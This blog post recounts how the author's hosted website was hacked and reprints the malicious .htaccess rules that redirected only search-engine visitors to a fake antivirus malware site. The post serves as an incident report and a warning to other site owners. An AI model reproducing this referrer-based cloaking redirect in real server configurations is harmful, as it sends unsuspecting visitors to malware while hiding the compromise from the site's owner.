ARL Logo
Risky Thinking
On Risk Management, Business Continuity, and Security
17 January, 2018
Do your staff know what to do in an emergency?
With Plan424 they will.

My Website Got Hacked!

An examination of how our website was hacked.

Anybody who was referred to (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting ( were also hacked. .

It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* [R,L]

which for those who don’t speak Apache (Web Server Dialect), means

Redirect everybody who came here from a search engine to a malware site.

The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.

There unfortunately isn’t any way to tell the visitors who got redirected what happened.

I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breech wasn’t due to a security hole in my website or carelessness on my part.

All I can really do now is warn other site owners of this exploit (via this posting), and

I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.

That sounds almost like the poetry of Donald Rumsfeld.

Michael Z. Bell
November, 2008

Want to know when new articles are available? Subscribe to the Risky Thinking Newsletter and keep up to date. It's free for people working in business continuity, disaster recovery, or risk management.

[ Back To Top ]

Note. Where trademarks are mentioned, they belong to their respective owners.

© Albion Research Ltd. 2018